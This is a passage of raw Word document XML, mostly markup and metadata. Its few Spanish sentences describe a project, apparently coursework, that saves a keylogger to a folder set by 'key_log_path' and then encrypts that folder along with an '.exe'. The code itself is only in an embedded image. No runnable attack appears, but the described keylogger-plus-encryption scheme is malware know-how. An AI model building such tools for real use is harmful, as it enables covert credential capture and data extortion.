      <w:r w:rsidR="00E93FB4">
        <w:t>el</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E93FB4">
        <w:t xml:space="preserve"> .exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD72806" w14:textId="383E4041" w:rsidR="00E93FB4" w:rsidRDefault="00E93FB4" w:rsidP="0030758A">
      <w:r>
        <w:t>Ahora adjuntamos el cifrado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3F35ED" w14:textId="68139D3F" w:rsidR="00E93FB4" w:rsidRDefault="000F66AB" w:rsidP="0030758A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53847691" wp14:editId="5B73B222">
            <wp:extent cx="5612130" cy="3156585"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="19101384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8446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6E84" w14:textId="4A0CD88D" w:rsidR="00CE50DA" w:rsidRDefault="000F66AB" w:rsidP="0030758A">
      <w:r>
        <w:t xml:space="preserve">La idea es guardar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keylogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en la carpeta que se va a cifrar, para ello usamos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>key_log_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: la dirección deseada y en esa misma, encriptamos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7304C0" w14:textId="77777777" w:rsidR="000F66AB" w:rsidRPr="009032BC" w:rsidRDefault="000F66AB" w:rsidP="0030758A"/>
    <w:sectPr w:rsidR="000F66AB" w:rsidRPr="009032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0CE"/>
    <w:rsid w:val="0000208E"/>
    <w:rsid w:val="00086F8C"/>
    <w:rsid w:val="000C23BD"/>
    <w:rsid w:val="000F66AB"/>
    <w:rsid w:val="00142603"/>
    <w:rsid w:val="0015627D"/>
    <w:rsid w:val="00175C43"/>
    <w:rsid w:val="00196EF9"/>
    <w:rsid w:val="00302736"/>
    <w:rsid w:val="0030758A"/>
    <w:rsid w:val="00444832"/>
    <w:rsid w:val="004945CF"/>
    <w:rsid w:val="00503D2D"/>
    <w:rsid w:val="005B2332"/>
    <w:rsid w:val="00603469"/>
    <w:rsid w:val="006961FF"/>
    <w:rsid w:val="006D4FE2"/>
    <w:rsid w:val="006E27DC"/>
    <w:rsid w:val="006E4C8B"/>
    <w:rsid w:val="00714412"/>
    <w:rsid w:val="00732A98"/>
    <w:rsid w:val="0078399E"/>
    <w:rsid w:val="00794AA5"/>
    <w:rsid w:val="007A185D"/>
    <w:rsid w:val="007F4BFE"/>
    <w:rsid w:val="007F78CC"/>
    <w:rsid w:val="008059C3"/>
    <w:rsid w:val="008657BD"/>
    <w:rsid w:val="008F5724"/>
    <w:rsid w:val="009032BC"/>
    <w:rsid w:val="00934194"/>
    <w:rsid w:val="00961586"/>
    <w:rsid w:val="00973553"/>
    <w:rsid w:val="00A23AAE"/>
    <w:rsid w:val="00A46F42"/>
    <w:rsid w:val="00A93946"/>
    <w:rsid w:val="00AC766A"/>
    <w:rsid w:val="00B50BA5"/>
    <w:rsid w:val="00C37E5B"/>
    <w:rsid w:val="00C9241B"/>
    <w:rsid w:val="00CD72AF"/>
    <w:rsid w:val="00CE50DA"/>
    <w:rsid w:val="00DA0CD0"/>
    <w:rsid w:val="00DA7CD8"/>
    <w:rsid w:val="00E0145F"/>
    <w:rsid w:val="00E93FB4"/>
    <w:rsid w:val="00ED2755"/>
    <w:rsid w:val="00F500CE"/>
    <w:rsid w:val="00FA5224"/>
    <w:rsid w:val="00FE54C5"/>
    <w:rsid w:val="00FF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5D4EB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{01C3781E-1696-4651-BFAD-A71B1860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5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84E2F6D1B7AF4CA4B52B1BCBED0B5F" ma:contentTypeVersion="16" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="c7239118638ff50c75cceb30dac5728a">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="33fb28c5-bcf2-48e8-89d4-14e88a6de59c" xmlns:ns4="ee8dabc9-f7c2-41a4-bed7-0edd0d7736ca" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="a277b285bac6aa8290dcfa57d1d129ee" ns3:_="" ns4:_="">
    <xsd:import namespace="33fb28c5-bcf2-48e8-89d4-14e88a6de59c"/>
    <xsd:import namespace="ee8dabc9-f7c2-41a4-bed7-0edd0d7736c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b28c5-bcf2-48e8-89d4-14e88a6de5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dabc9-f7c2-41a4-bed7-0edd0d7736c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fb28c5-bcf2-48e8-89d4-14e88a6de59c" xsi:nil="true"/>
  </documentManagement>
</p:properties>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{40AB002A-67C1-4E65-AEFD-06C2DA42CC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5A4355-EBA1-47E7-B6D2-F54E81322F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fb28c5-bcf2-48e8-89d4-14e88a6de59c"/>
    <ds:schemaRef ds:uri="ee8dabc9-f7c2-41a4-bed7-0edd0d7736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08A264-12B0-4423-BEAC-314B9A91871F}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="ee8dabc9-f7c2-41a4-bed7-0edd0d7736ca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33fb28c5-bcf2-48e8-89d4-14e88a6de59c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613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Londo�o Quintero</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Juan Pablo Londo�o Quintero</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-27T00:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-27T00:59:00Z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0x010100BE84E2F6D1B7AF4CA4B52B1BCBED0B5F</vt:lpwstr>
  </property>
</Properties>
</file>